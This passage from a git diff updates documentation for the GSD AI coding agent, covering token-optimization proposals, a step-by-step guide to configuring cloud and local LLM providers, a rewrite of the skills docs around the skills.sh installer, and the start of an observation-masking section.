+- **Skill prefetching**: Before a known long session (e.g., auto-mode start), pre-inject all likely skills with `cache_control` so they're cached for the entire session.
+
+---
+
+## 7. Token Estimation Accuracy
+
+**Current state** (`compaction.ts`, line 216): `chars / 4` heuristic. This overestimates token count for English prose (~3.5 chars/token) and underestimates for code with short identifiers or Unicode.
+
+**Opportunity**: Use a proper tokenizer.
+- `@anthropic-ai/tokenizer` (tiktoken-compatible, ships with the SDK) — accurate but ~5ms per call
+- Tiered approach: use chars/4 for display; use proper tokenizer only for compaction threshold decisions (where accuracy matters)
+
+**Impact**: More accurate compaction timing, fewer unnecessary compactions, slightly better `COMPACTION_KEEP_RECENT_TOKENS` boundary placement.
+
+---
+
+## 8. Format: Markdown over XML for Internal Context
+
+**Current state**: The message pipeline uses `<skill>`, `<summary>`, `<compaction>` XML wrappers in several places. System prompt sections are largely prose Markdown.
+
+**Findings**: XML tags carry 15–40% more tokens than equivalent Markdown for the same semantic content, due to paired open/close tags. However, Claude was optimized for XML and shows higher accuracy on tasks requiring precise section parsing.
+
+**Recommendation**: Audit XML usage in the pipeline and convert to Markdown where the content is:
+- Non-nested (flat instructions, status messages)
+- Human-readable rather than machine-parsed by the model
+- Not requiring precise boundary detection
+
+Keep XML for: few-shot examples with ambiguous boundaries, skill content (requires precise isolation from surrounding text), compaction summaries that the model must treat as authoritative history.
+
+**Estimated savings**: 5–15% reduction in system prompt token count.
+
+---
+
+## 9. Dynamic Tool Set Delivery
+
+**Current state**: All tool definitions are included in every LLM request. Tool descriptions consume 60–80% of input tokens in static configurations. As new extensions register tools, the baseline grows linearly.
+
+**Opportunity** (higher complexity): Implement the three-function Dynamic Toolset pattern:
+1. `search_tools(query)` — semantic search over tool catalog
+2. `describe_tools(ids[])` — fetch full schemas on demand
+3. `execute_tool(id, params)` — unchanged execution
+
+Speakeasy measured 91–97% token reduction with 100% task success rate. Trade-off: 2–3x more tool calls, ~50% longer wall time. Net cost dramatically lower.
+
+**Feasibility for pi**: The tool registry (`packages/pi-coding-agent/src/core/tool-registry.ts`) already stores tool metadata separately from definitions. The primary engineering work is the semantic search index and the `describe_tools` / `search_tools` tool implementations.
+
+---
+
+## 10. Cost Attribution and Per-Phase Reporting
+
+**Current state**: `SessionManager.getUsageTotals()` accumulates cost across the entire session. No per-phase or per-agent breakdown is stored. Cost visibility is limited to the footer total and `GSD_SHOW_TOKEN_COST=1` per-turn display.
+
+**Opportunity**: Emit structured cost events that extensions can subscribe to:
+```typescript
+interface CostCheckpointEvent {
+  type: "cost_checkpoint";
+  label: string;          // "discuss-phase", "execute-slice-3"
+  deltaTokens: Usage;     // tokens since last checkpoint
+  cumulativeTokens: Usage;
+  cumulativeCost: number;
+}
+```
+
+GSD extension could consume these events to surface per-milestone cost in `/gsd stats` and flag milestones that are disproportionately expensive — enabling budget-aware planning.
+
+---
+
+## Implementation Ordering (if pursued)
+
+| Priority | Item | Effort | Expected Impact |
+|----------|------|--------|-----------------|
+| 1 | Prompt caching (`cache_control`) | Low | 80–90% input cost reduction |
+| 2 | Earlier compaction threshold (70%) | Trivial | Reduces drift in long sessions |
+| 3 | Tool result truncation at write time | Low | Reduces context bloat between compactions |
+| 4 | Context file deduplication | Medium | Variable — high for multi-level AGENTS.md setups |
+| 5 | Observation masking (default `transformContext`) | Medium | 50%+ on long-running agents |
+| 6 | Token estimation (proper tokenizer) | Low | Accuracy improvement, minor cost impact |
+| 7 | Markdown over XML audit | Low | 5–15% system prompt reduction |
+| 8 | Skill caching with `cache_control` | Low | Meaningful for skill-heavy sessions |
+| 9 | Dynamic tool set delivery | High | 90%+ on large tool catalogs; major architecture change |
+| 10 | Per-phase cost attribution events | Medium | Visibility only; enables future budget routing |
diff --git a/docs/pr-1530/01-full.png b/docs/pr-1530/01-full.png
deleted file mode 100644
index 032098a0a..000000000
Binary files a/docs/pr-1530/01-full.png and /dev/null differ
diff --git a/docs/pr-1530/02-small.png b/docs/pr-1530/02-small.png
deleted file mode 100644
index 7221c0d76..000000000
Binary files a/docs/pr-1530/02-small.png and /dev/null differ
diff --git a/docs/pr-1530/03-min.png b/docs/pr-1530/03-min.png
deleted file mode 100644
index 4e93052a9..000000000
Binary files a/docs/pr-1530/03-min.png and /dev/null differ
diff --git a/docs/pr-1530/04-unhealthy.png b/docs/pr-1530/04-unhealthy.png
deleted file mode 100644
index 2d62e88be..000000000
Binary files a/docs/pr-1530/04-unhealthy.png and /dev/null differ
diff --git a/docs/pr-876/01-index.png b/docs/pr-876/01-index.png
deleted file mode 100644
index dc2957b92..000000000
Binary files a/docs/pr-876/01-index.png and /dev/null differ
diff --git a/docs/pr-876/02-summary.png b/docs/pr-876/02-summary.png
deleted file mode 100644
index dea9d8cb1..000000000
Binary files a/docs/pr-876/02-summary.png and /dev/null differ
diff --git a/docs/pr-876/03-progress.png b/docs/pr-876/03-progress.png
deleted file mode 100644
index 9dec3856b..000000000
Binary files a/docs/pr-876/03-progress.png and /dev/null differ
diff --git a/docs/pr-876/04-depgraph.png b/docs/pr-876/04-depgraph.png
deleted file mode 100644
index b1349dead..000000000
Binary files a/docs/pr-876/04-depgraph.png and /dev/null differ
diff --git a/docs/pr-876/05-metrics.png b/docs/pr-876/05-metrics.png
deleted file mode 100644
index bb8083030..000000000
Binary files a/docs/pr-876/05-metrics.png and /dev/null differ
diff --git a/docs/pr-876/06-changelog.png b/docs/pr-876/06-changelog.png
deleted file mode 100644
index c79e00f2d..000000000
Binary files a/docs/pr-876/06-changelog.png and /dev/null differ
diff --git a/docs/pr-876/06-timeline.png b/docs/pr-876/06-timeline.png
deleted file mode 100644
index 62d081703..000000000
Binary files a/docs/pr-876/06-timeline.png and /dev/null differ
diff --git a/docs/pr-876/07-changelog.png b/docs/pr-876/07-changelog.png
deleted file mode 100644
index f279f6d95..000000000
Binary files a/docs/pr-876/07-changelog.png and /dev/null differ
diff --git a/docs/pr-876/07-knowledge.png b/docs/pr-876/07-knowledge.png
deleted file mode 100644
index 2e7e32952..000000000
Binary files a/docs/pr-876/07-knowledge.png and /dev/null differ
diff --git a/docs/pr-876/08-knowledge.png b/docs/pr-876/08-knowledge.png
deleted file mode 100644
index 14a4dd33b..000000000
Binary files a/docs/pr-876/08-knowledge.png and /dev/null differ
diff --git a/docs/pr-876/09-captures.png b/docs/pr-876/09-captures.png
deleted file mode 100644
index f3c29a40e..000000000
Binary files a/docs/pr-876/09-captures.png and /dev/null differ
diff --git a/docs/pr-876/10-artifacts.png b/docs/pr-876/10-artifacts.png
deleted file mode 100644
index 7aab45ec9..000000000
Binary files a/docs/pr-876/10-artifacts.png and /dev/null differ
diff --git a/docs/providers.md b/docs/providers.md
new file mode 100644
index 000000000..984ee369c
--- /dev/null
+++ b/docs/providers.md
@@ -0,0 +1,587 @@
+# Provider Setup Guide
+
+Step-by-step setup instructions for every LLM provider GSD supports. If you ran the onboarding wizard (`gsd config`) and picked a provider, you may already be configured — check with `/model` inside a session.
+
+## Table of Contents
+
+- [Quick Reference](#quick-reference)
+- [Built-in Providers](#built-in-providers)
+  - [Anthropic (Claude)](#anthropic-claude)
+  - [OpenAI](#openai)
+  - [Google Gemini](#google-gemini)
+  - [OpenRouter](#openrouter)
+  - [Groq](#groq)
+  - [xAI (Grok)](#xai-grok)
+  - [Mistral](#mistral)
+  - [GitHub Copilot](#github-copilot)
+  - [Amazon Bedrock](#amazon-bedrock)
+  - [Anthropic on Vertex AI](#anthropic-on-vertex-ai)
+  - [Azure OpenAI](#azure-openai)
+- [Local Providers](#local-providers)
+  - [Ollama](#ollama)
+  - [LM Studio](#lm-studio)
+  - [vLLM](#vllm)
+  - [SGLang](#sglang)
+- [Custom OpenAI-Compatible Endpoints](#custom-openai-compatible-endpoints)
+- [Common Pitfalls](#common-pitfalls)
+- [Verifying Your Setup](#verifying-your-setup)
+
+## Quick Reference
+
+| Provider | Auth Method | Env Variable | Config File |
+|----------|-------------|-------------|-------------|
+| Anthropic | OAuth or API key | `ANTHROPIC_API_KEY` | — |
+| OpenAI | API key | `OPENAI_API_KEY` | — |
+| Google Gemini | API key | `GEMINI_API_KEY` | — |
+| OpenRouter | API key | `OPENROUTER_API_KEY` | Optional `models.json` |
+| Groq | API key | `GROQ_API_KEY` | — |
+| xAI | API key | `XAI_API_KEY` | — |
+| Mistral | API key | `MISTRAL_API_KEY` | — |
+| GitHub Copilot | OAuth | `GH_TOKEN` | — |
+| Amazon Bedrock | IAM credentials | `AWS_PROFILE` or `AWS_ACCESS_KEY_ID` | — |
+| Vertex AI | ADC | `GOOGLE_APPLICATION_CREDENTIALS` | — |
+| Azure OpenAI | API key | `AZURE_OPENAI_API_KEY` | — |
+| Ollama | None (local) | — | `models.json` required |
+| LM Studio | None (local) | — | `models.json` required |
+| vLLM / SGLang | None (local) | — | `models.json` required |
+
+---
+
+## Built-in Providers
+
+Built-in providers have models pre-registered in GSD. You only need to supply credentials.
+
+### Anthropic (Claude)
+
+**Recommended.** Anthropic models have the deepest integration: built-in web search, extended thinking, and prompt caching.
+
+**Option A — Browser sign-in (recommended):**
+
+```bash
+gsd config
+# Choose "Sign in with your browser" → "Anthropic (Claude)"
+```
+
+Or inside a session: `/login`
+
+**Option B — API key:**
+
+```bash
+export ANTHROPIC_API_KEY="sk-ant-..."
+```
+
+Or paste it during `gsd config` when prompted.
+
+**Get a key:** [console.anthropic.com/settings/keys](https://console.anthropic.com/settings/keys)
+
+### OpenAI
+
+```bash
+export OPENAI_API_KEY="sk-..."
+```
+
+Or run `gsd config` and choose "Paste an API key" then "OpenAI".
+
+**Get a key:** [platform.openai.com/api-keys](https://platform.openai.com/api-keys)
+
+### Google Gemini
+
+```bash
+export GEMINI_API_KEY="..."
+```
+
+**Get a key:** [aistudio.google.com/app/apikey](https://aistudio.google.com/app/apikey)
+
+### OpenRouter
+
+OpenRouter aggregates 200+ models from multiple providers behind a single API key.
+
+**Step 1 — Get your API key:**
+
+Go to [openrouter.ai/keys](https://openrouter.ai/keys) and create a key.
+
+**Step 2 — Set the key:**
+
+```bash
+export OPENROUTER_API_KEY="sk-or-..."
+```
+
+Or run `gsd config`, choose "Paste an API key", then "OpenRouter".
+
+**Step 3 — Switch to an OpenRouter model:**
+
+Inside a GSD session, type `/model` and select an OpenRouter model. Models are prefixed with `openrouter/` (e.g., `openrouter/anthropic/claude-sonnet-4`).
+
+**Optional — Add custom OpenRouter models via `models.json`:**
+
+If you want models not in the built-in list, add them to `~/.gsd/agent/models.json`:
+
+```json
+{
+  "providers": {
+    "openrouter": {
+      "baseUrl": "https://openrouter.ai/api/v1",
+      "apiKey": "OPENROUTER_API_KEY",
+      "api": "openai-completions",
+      "models": [
+        {
+          "id": "meta-llama/llama-3.3-70b",
+          "name": "Llama 3.3 70B (OpenRouter)",
+          "reasoning": false,
+          "input": ["text"],
+          "contextWindow": 131072,
+          "maxTokens": 32768,
+          "cost": { "input": 0.3, "output": 0.3, "cacheRead": 0, "cacheWrite": 0 }
+        }
+      ]
+    }
+  }
+}
+```
+
+Note: the `apiKey` field here is the *name* of the environment variable, not the literal key. GSD resolves it automatically. You can also use a literal value or a shell command (see [Value Resolution](./custom-models.md#value-resolution)).
+
+**Optional — Route through specific providers:**
+
+Use `modelOverrides` to control which upstream provider OpenRouter uses:
+
+```json
+{
+  "providers": {
+    "openrouter": {
+      "modelOverrides": {
+        "anthropic/claude-sonnet-4": {
+          "compat": {
+            "openRouterRouting": {
+              "only": ["amazon-bedrock"]
+            }
+          }
+        }
+      }
+    }
+  }
+}
+```
+
+### Groq
+
+```bash
+export GROQ_API_KEY="gsk_..."
+```
+
+**Get a key:** [console.groq.com/keys](https://console.groq.com/keys)
+
+### xAI (Grok)
+
+```bash
+export XAI_API_KEY="xai-..."
+```
+
+**Get a key:** [console.x.ai](https://console.x.ai)
+
+### Mistral
+
+```bash
+export MISTRAL_API_KEY="..."
+```
+
+**Get a key:** [console.mistral.ai/api-keys](https://console.mistral.ai/api-keys)
+
+### GitHub Copilot
+
+Uses OAuth — sign in through the browser:
+
+```bash
+gsd config
+# Choose "Sign in with your browser" → "GitHub Copilot"
+```
+
+Requires an active GitHub Copilot subscription.
+
+### Amazon Bedrock
+
+Bedrock uses AWS IAM credentials, not API keys. Any of these work:
+
+```bash
+# Option 1: Named profile
+export AWS_PROFILE="my-profile"
+
+# Option 2: IAM keys
+export AWS_ACCESS_KEY_ID="AKIA..."
+export AWS_SECRET_ACCESS_KEY="..."
+export AWS_REGION="us-east-1"
+
+# Option 3: Bedrock API key (bearer token)
+export AWS_BEARER_TOKEN_BEDROCK="..."
+```
+
+ECS task roles and IRSA (Kubernetes) are also detected automatically.
+
+### Anthropic on Vertex AI
+
+Uses Google Cloud Application Default Credentials:
+
+```bash
+gcloud auth application-default login
+export ANTHROPIC_VERTEX_PROJECT_ID="my-project-id"
+```
+
+Or set `GOOGLE_CLOUD_PROJECT` and ensure ADC credentials exist at `~/.config/gcloud/application_default_credentials.json`.
+
+### Azure OpenAI
+
+```bash
+export AZURE_OPENAI_API_KEY="..."
+```
+
+---
+
+## Local Providers
+
+Local providers run on your machine. They require a `models.json` configuration file because GSD needs to know the endpoint URL and which models are available.
+
+**Config file location:** `~/.gsd/agent/models.json`
+
+The file reloads each time you open `/model` — no restart needed.
+
+### Ollama
+
+**Step 1 — Install and start Ollama:**
+
+```bash
+# macOS
+brew install ollama
+ollama serve
+
+# Or download from https://ollama.com
+```
+
+**Step 2 — Pull a model:**
+
+```bash
+ollama pull llama3.1:8b
+ollama pull qwen2.5-coder:7b
+```
+
+**Step 3 — Create `~/.gsd/agent/models.json`:**
+
+```json
+{
+  "providers": {
+    "ollama": {
+      "baseUrl": "http://localhost:11434/v1",
+      "api": "openai-completions",
+      "apiKey": "ollama",
+      "compat": {
+        "supportsDeveloperRole": false,
+        "supportsReasoningEffort": false
+      },
+      "models": [
+        { "id": "llama3.1:8b" },
+        { "id": "qwen2.5-coder:7b" }
+      ]
+    }
+  }
+}
+```
+
+The `apiKey` is required by the config schema but Ollama ignores it — any value works.
+
+**Step 4 — Select the model:**
+
+Inside GSD, type `/model` and pick your Ollama model.
+
+**Ollama tips:**
+- Ollama does not support the `developer` role or `reasoning_effort` — always set `compat.supportsDeveloperRole: false` and `compat.supportsReasoningEffort: false`.
+- If you get empty responses, check that `ollama serve` is running and the model is pulled.
+- Context window and max tokens default to 128K / 16K if not specified. Override these if your model has different limits.
+
+### LM Studio
+
+**Step 1 — Install LM Studio:**
+
+Download from [lmstudio.ai](https://lmstudio.ai).
+
+**Step 2 — Start the local server:**
+
+In LM Studio, go to the "Local Server" tab, load a model, and click "Start Server". The default port is 1234.
+
+**Step 3 — Create `~/.gsd/agent/models.json`:**
+
+```json
+{
+  "providers": {
+    "lm-studio": {
+      "baseUrl": "http://localhost:1234/v1",
+      "api": "openai-completions",
+      "apiKey": "lm-studio",
+      "compat": {
+        "supportsDeveloperRole": false,
+        "supportsReasoningEffort": false
+      },
+      "models": [
+        {
+          "id": "your-model-name",
+          "name": "My Local Model",
+          "contextWindow": 32768,
+          "maxTokens": 4096
+        }
+      ]
+    }
+  }
+}
+```
+
+Replace `your-model-name` with the model identifier shown in LM Studio's server tab.
+
+**LM Studio tips:**
+- The model ID in `models.json` must match what LM Studio reports in its server API. Check the server tab for the exact string.
+- LM Studio defaults to port 1234. If you changed it, update `baseUrl` accordingly.
+- Increase `contextWindow` and `maxTokens` if your model supports larger contexts.
+
+### vLLM
+
+```json
+{
+  "providers": {
+    "vllm": {
+      "baseUrl": "http://localhost:8000/v1",
+      "api": "openai-completions",
+      "apiKey": "vllm",
+      "compat": {
+        "supportsDeveloperRole": false,
+        "supportsReasoningEffort": false,
+        "supportsUsageInStreaming": false
+      },
+      "models": [
+        {
+          "id": "meta-llama/Llama-3.1-8B-Instruct",
+          "contextWindow": 128000,
+          "maxTokens": 16384
+        }
+      ]
+    }
+  }
+}
+```
+
+The model `id` must match the `--model` flag you passed to `vllm serve`.
+
+### SGLang
+
+```json
+{
+  "providers": {
+    "sglang": {
+      "baseUrl": "http://localhost:30000/v1",
+      "api": "openai-completions",
+      "apiKey": "sglang",
+      "compat": {
+        "supportsDeveloperRole": false,
+        "supportsReasoningEffort": false
+      },
+      "models": [
+        {
+          "id": "meta-llama/Llama-3.1-8B-Instruct"
+        }
+      ]
+    }
+  }
+}
+```
+
+---
+
+## Custom OpenAI-Compatible Endpoints
+
+Any server that implements the OpenAI Chat Completions API can work with GSD. This covers proxies (LiteLLM, Portkey, Helicone), self-hosted inference, and new providers.
+
+**Quickest path — use the onboarding wizard:**
+
+```bash
+gsd config
+# Choose "Paste an API key" → "Custom (OpenAI-compatible)"
+# Enter: base URL, API key, model ID
+```
+
+This writes `~/.gsd/agent/models.json` for you automatically.
+
+**Manual setup:**
+
+```json
+{
+  "providers": {
+    "my-provider": {
+      "baseUrl": "https://my-endpoint.example.com/v1",
+      "apiKey": "MY_PROVIDER_API_KEY",
+      "api": "openai-completions",
+      "models": [
+        {
+          "id": "model-id-here",
+          "name": "Friendly Model Name",
+          "reasoning": false,
+          "input": ["text"],
+          "contextWindow": 128000,
+          "maxTokens": 16384,
+          "cost": { "input": 0, "output": 0, "cacheRead": 0, "cacheWrite": 0 }
+        }
+      ]
+    }
+  }
+}
+```
+
+**Adding custom headers (for proxies):**
+
+```json
+{
+  "providers": {
+    "litellm-proxy": {
+      "baseUrl": "https://litellm.example.com/v1",
+      "apiKey": "MY_API_KEY",
+      "api": "openai-completions",
+      "headers": {
+        "x-custom-header": "value"
+      },
+      "models": [...]
+    }
+  }
+}
+```
+
+**Qwen models with thinking mode:**
+
+For Qwen-compatible servers, use `thinkingFormat` to enable thinking mode:
+
+```json
+{
+  "compat": {
+    "thinkingFormat": "qwen",
+    "supportsDeveloperRole": false
+  }
+}
+```
+
+Use `"qwen-chat-template"` instead if the server requires `chat_template_kwargs.enable_thinking`.
+
+For the full reference on `compat` fields, `modelOverrides`, value resolution, and advanced configuration, see [Custom Models](./custom-models.md).
+
+---
+
+## Common Pitfalls
+
+### "Authentication failed" with a valid key
+
+**Cause:** The key is set in your shell but not visible to GSD.
+
+**Fix:** Make sure the environment variable is exported in the same terminal where you run `gsd`. Or use `gsd config` to save the key to `~/.gsd/agent/auth.json` so it persists across sessions.
+
+### OpenRouter models not appearing in `/model`
+
+**Cause:** No `OPENROUTER_API_KEY` set, so GSD hides OpenRouter models.
+
+**Fix:** Set the key and restart GSD:
+
+```bash
+export OPENROUTER_API_KEY="sk-or-..."
+gsd
+```
+
+### Ollama returns empty responses
+
+**Cause:** Ollama server isn't running, or the model isn't pulled.
+
+**Fix:**
+
+```bash
+# Verify the server is running
+curl http://localhost:11434/v1/models
+
+# Pull the model if missing
+ollama pull llama3.1:8b
+```
+
+### LM Studio model ID mismatch
+
+**Cause:** The `id` in `models.json` doesn't match what LM Studio exposes via its API.
+
+**Fix:** Check the LM Studio server tab for the exact model identifier. It often includes the filename or quantization level (e.g., `lmstudio-community/Meta-Llama-3.1-8B-Instruct-GGUF`).
+
+### `developer` role error with local models
+
+**Cause:** Most local inference servers don't support the OpenAI `developer` message role.
+
+**Fix:** Add `compat.supportsDeveloperRole: false` to the provider config. This makes GSD send `system` messages instead:
+
+```json
+{
+  "compat": {
+    "supportsDeveloperRole": false,
+    "supportsReasoningEffort": false
+  }
+}
+```
+
+### `stream_options` error with local models
+
+**Cause:** Some servers don't support `stream_options: { include_usage: true }`.
+
+**Fix:** Add `compat.supportsUsageInStreaming: false`:
+
+```json
+{
+  "compat": {
+    "supportsUsageInStreaming": false
+  }
+}
+```
+
+### "apiKey is required" validation error
+
+**Cause:** `models.json` schema requires `apiKey` when `models` are defined.
+
+**Fix:** For local servers that don't need auth, set a dummy value:
+
+```json
+"apiKey": "not-needed"
+```
+
+### Cost shows $0.00 for custom models
+
+**Expected behavior.** GSD defaults cost to zero for custom models. Override with the `cost` field if you want accurate cost tracking:
+
+```json
+"cost": { "input": 0.15, "output": 0.60, "cacheRead": 0.015, "cacheWrite": 0.19 }
+```
+
+Values are per million tokens.
+
+---
+
+## Verifying Your Setup
+
+After configuring a provider:
+
+1. **Launch GSD:**
+   ```bash
+   gsd
+   ```
+
+2. **Check available models:**
+   ```
+   /model
+   ```
+   Your provider's models should appear in the list.
+
+3. **Switch to the model:**
+   Select it from the `/model` picker.
+
+4. **Send a test message:**
+   Type anything to confirm the model responds.
+
+If the model doesn't appear, check:
+- The environment variable is set in the current shell
+- `models.json` is valid JSON (use `cat ~/.gsd/agent/models.json | python3 -m json.tool`)
+- The server is running (for local providers)
+
+For additional help, see [Troubleshooting](./troubleshooting.md) or run `/gsd doctor` inside a session.
diff --git a/docs/remote-questions.md b/docs/remote-questions.md
index 8e4ce3555..8078a9c56 100644
--- a/docs/remote-questions.md
+++ b/docs/remote-questions.md
@@ -16,7 +16,7 @@ The setup wizard:
 3. Lists servers the bot belongs to (or lets you pick)
 4. Lists text channels in the selected server
 5. Sends a test message to confirm permissions
-6. Saves the configuration to `~/.gsd/preferences.md`
+6. Saves the configuration to `~/.gsd/PREFERENCES.md`
 
 **Bot requirements:**
 - A Discord bot application with a token (from [Discord Developer Portal](https://discord.com/developers/applications))
@@ -65,7 +65,7 @@ The setup wizard:
 
 ## Configuration
 
-Remote questions are configured in `~/.gsd/preferences.md`:
+Remote questions are configured in `~/.gsd/PREFERENCES.md`:
 
 ```yaml
 remote_questions:
diff --git a/docs/skills.md b/docs/skills.md
index 71f039546..6a9e1d567 100644
--- a/docs/skills.md
+++ b/docs/skills.md
@@ -2,28 +2,85 @@
 
 Skills are specialized instruction sets that GSD loads when the task matches. They provide domain-specific guidance for the LLM — coding patterns, framework idioms, testing strategies, and tool usage.
 
-## Bundled Skills
+Skills follow the open [Agent Skills standard](https://agentskills.io/) and are **not GSD-specific** — they work with Claude Code, OpenAI Codex, Cursor, GitHub Copilot, Windsurf, and 40+ other agents.
 
-GSD ships with these skills, installed to `~/.gsd/agent/skills/`:
+## Skill Directories
 
-| Skill | Trigger | Description |
-|-------|---------|-------------|
-| `frontend-design` | Web UI work — components, pages, dashboards, styling | Production-grade frontend with high design quality |
-| `swiftui` | macOS/iOS apps — SwiftUI, Xcode, App Store | Full lifecycle from creation to shipping |
-| `debug-like-expert` | Complex debugging — after standard approaches fail | Methodical investigation with evidence gathering |
-| `rust-core` | Rust code — ownership, lifetimes, traits, async | Idiomatic, safe, performant Rust patterns |
-| `axum-web-framework` | Axum web apps — routing, middleware, extractors | Complete Axum development guide |
-| `axum-tests` | Testing Axum apps — integration tests, mock state | Test patterns for Axum applications |
-| `tauri` | Tauri v2 desktop apps — setup, plugins, bundling | Cross-platform desktop app development |
-| `tauri-ipc-developer` | Tauri IPC — React-Rust type-safe communication | Command scaffolding and serialization |
-| `tauri-devtools` | Tauri debugging — CrabNebula DevTools integration | Profiling and monitoring |
-| `github-workflows` | GitHub Actions — CI/CD, workflow debugging | Live syntax, run monitoring, failure diagnosis |
-| `security-audit` | Security auditing — dependency scanning, OWASP | Comprehensive security assessment |
-| `security-review` | Code security review — injection, XSS, auth flaws | Vulnerability-focused code review |
-| `security-docker` | Docker security — Dockerfile, runtime hardening | Container security best practices |
-| `review` | Code review — staged changes, PRs, security, performance | Diff-aware code review with quality analysis |
-| `test` | Test generation and execution — auto-detects frameworks | Generate tests or run existing suites with failure analysis |
-| `lint` | Linting and formatting — ESLint, Biome, Prettier | Auto-detect linter, fix issues, report remaining problems |
+GSD reads skills from two locations, in priority order:
+
+| Location                          | Scope   | Description                                              |
+|-----------------------------------|---------|----------------------------------------------------------|
+| `~/.agents/skills/`              | Global  | Shared across all projects and all compatible agents     |
+| `.agents/skills/` (project root) | Project | Project-specific skills, committable to version control  |
+
+Global skills take precedence over project skills when names collide.
+
+> **Migration from `~/.gsd/agent/skills/`:** On first launch after upgrading, GSD automatically copies skills from the legacy `~/.gsd/agent/skills/` directory to `~/.agents/skills/`. The old directory is preserved for backward compatibility.
+
+## Installing Skills
+
+Skills are installed via the [skills.sh CLI](https://skills.sh):
+
+```bash
+# Interactive — choose skills and target agents
+npx skills add dpearson2699/swift-ios-skills
+
+# Install specific skills non-interactively
+npx skills add dpearson2699/swift-ios-skills --skill swift-concurrency --skill swiftui-patterns -y
+
+# Install all skills from a repo
+npx skills add dpearson2699/swift-ios-skills --all
+
+# Check for updates
+npx skills check
+
+# Update installed skills
+npx skills update
+```
+
+### Onboarding Catalog
+
+During `gsd init`, GSD detects the project's tech stack and recommends relevant skill packs. For brownfield projects, detection is automatic; for greenfield projects, the user picks a tech stack.
+
+The curated catalog is maintained in `src/resources/extensions/gsd/skill-catalog.ts`. Each entry maps a tech stack to a skills.sh repo and specific skill names.
+
+#### Available Skill Packs
+
+**Swift (any Swift project — `Package.swift` or `.xcodeproj` detected):**
+- **SwiftUI** — layout, navigation, animations, gestures, Liquid Glass
+- **Swift Core** — Swift language, concurrency, Codable, Charts, Testing, SwiftData
+
+**iOS (only when `.xcodeproj` targets `iphoneos` via SDKROOT):**
+- **iOS App Frameworks** — App Intents, Widgets, StoreKit, MapKit, Live Activities
+- **iOS Data Frameworks** — CloudKit, HealthKit, MusicKit, WeatherKit, Contacts
+- **iOS AI & ML** — Core ML, Vision, on-device AI, speech recognition
+- **iOS Engineering** — networking, security, accessibility, localization, Instruments
+- **iOS Hardware** — Bluetooth, CoreMotion, NFC, PencilKit, RealityKit
+- **iOS Platform** — CallKit, EnergyKit, HomeKit, SharePlay, PermissionKit
+
+**Web:**
+- **React & Web Frontend** — React best practices, web design, composition patterns
+- **React Native** — cross-platform mobile patterns
+- **Frontend Design & UX** — frontend design, accessibility
+
+**Languages:**
+- **Rust** — Rust patterns and best practices
+- **Python** — Python patterns and best practices
+- **Go** — Go patterns and best practices
+
+**General:**
+- **Document Handling** — PDF, DOCX, XLSX, PPTX creation and manipulation
+
+### Maintaining the Catalog
+
+The skill catalog lives in [`src/resources/extensions/gsd/skill-catalog.ts`](../src/resources/extensions/gsd/skill-catalog.ts). To add or update a pack:
+
+1. Add a `SkillPack` entry to the `SKILL_CATALOG` array with `repo`, `skills`, and matching criteria
+2. For language-detection matching, use `matchLanguages` (values from `detection.ts` `LANGUAGE_MAP`)
+3. For Xcode platform matching, use `matchXcodePlatforms` (e.g., `["iphoneos"]` — parsed from `SDKROOT` in `project.pbxproj`)
+4. For file-presence matching, use `matchFiles` (checked against `PROJECT_FILES` in `detection.ts`)
+5. If the pack should appear in greenfield choices, add it to `GREENFIELD_STACKS`
+6. Packs sharing the same `repo` are batched into a single `npx skills add` invocation
 
 ## Skill Discovery
 
@@ -59,18 +116,18 @@ skill_rules:
 ### Resolution Order
 
 Skills can be referenced by:
-1. **Bare name** — e.g., `frontend-design` → scans `~/.gsd/agent/skills/` and project skills
-2. **Absolute path** — e.g., `/Users/you/.gsd/agent/skills/my-skill/SKILL.md`
+1. **Bare name** — e.g., `frontend-design` → scans `~/.agents/skills/` and project `.agents/skills/`
+2. **Absolute path** — e.g., `/Users/you/.agents/skills/my-skill/SKILL.md`
 3. **Directory path** — e.g., `~/custom-skills/my-skill` → looks for `SKILL.md` inside
 
-User skills (`~/.gsd/agent/skills/`) take precedence over project skills.
+Global skills (`~/.agents/skills/`) take precedence over project skills (`.agents/skills/`).
 
 ## Custom Skills
 
 Create your own skills by adding a directory with a `SKILL.md` file:
 
 ```
-~/.gsd/agent/skills/my-skill/
+~/.agents/skills/my-skill/
   SKILL.md           — instructions for the LLM
   references/        — optional reference files
 ```
@@ -82,10 +139,12 @@ The `SKILL.md` file contains instructions the LLM follows when the skill is acti
 Place skills in your project for project-specific guidance:
 
 ```
-.gsd/agent/skills/my-project-skill/
+.agents/skills/my-project-skill/
   SKILL.md
 ```
 
+Project-local skills can be committed to version control so team members share the same skill set.
+
 ## Skill Lifecycle Management
 
 GSD tracks skill performance across auto-mode sessions and surfaces health data to help you maintain skill quality.
diff --git a/docs/token-optimization.md b/docs/token-optimization.md
index a622869d1..4a3a423af 100644
--- a/docs/token-optimization.md
+++ b/docs/token-optimization.md
@@ -257,20 +257,64 @@ models:
 ## How the Pieces Fit Together
 
 ```
-preferences.md
+PREFERENCES.md
   └─ token_profile: balanced
        ├─ resolveProfileDefaults() → model defaults + phase skip defaults
        ├─ resolveInlineLevel() → standard
        │    └─ prompt builders gate context inclusion by level
-       └─ classifyUnitComplexity() → routes to execution/execution_simple model
-            ├─ task plan analysis (steps, files, signals)
-            ├─ unit type defaults
-            ├─ budget pressure adjustment
-            └─ adaptive learning from routing-history.json
+       ├─ classifyUnitComplexity() → routes to execution/execution_simple model
+       │    ├─ task plan analysis (steps, files, signals)
+       │    ├─ unit type defaults
+       │    ├─ budget pressure adjustment
+       │    ├─ adaptive learning from routing-history.json
+       │    └─ capability scoring (when capability_routing: true)
+       │         └─ 7-dimension model profiles × task requirement vectors
+       └─ context_management
+            ├─ observation masking (before_provider_request hook)
+            ├─ tool result truncation (tool_result_max_chars)
+            └─ phase handoff anchors (injected into prompt builders)
 ```
 
 The profile is resolved once and flows through the entire dispatch pipeline. Explicit preferences override profile defaults at every layer.
 
+## Observation Masking
+
+*Introduced in v2.59.0*
+
+During auto-mode sessions, tool results accumulate in the conversation history and consume context window space. Observation masking replaces tool result content older than N user turns with a lightweight placeholder before each LLM call. This reduces token usage with zero LLM overhead — no summarization calls, no latency.
+
+Masking is enabled by default during auto-mode. Configure via preferences:
+
+```yaml
+context_management:
+  observation_masking: true     # default: true (set false to disable)
+  observation_mask_turns: 8     # keep results from last 8 user turns (range: 1-50)
+  tool_result_max_chars: 800    # truncate individual tool results beyond this length
+```
+
+### How It Works
+
+1. Before each provider request, the `before_provider_request` hook inspects the messages array
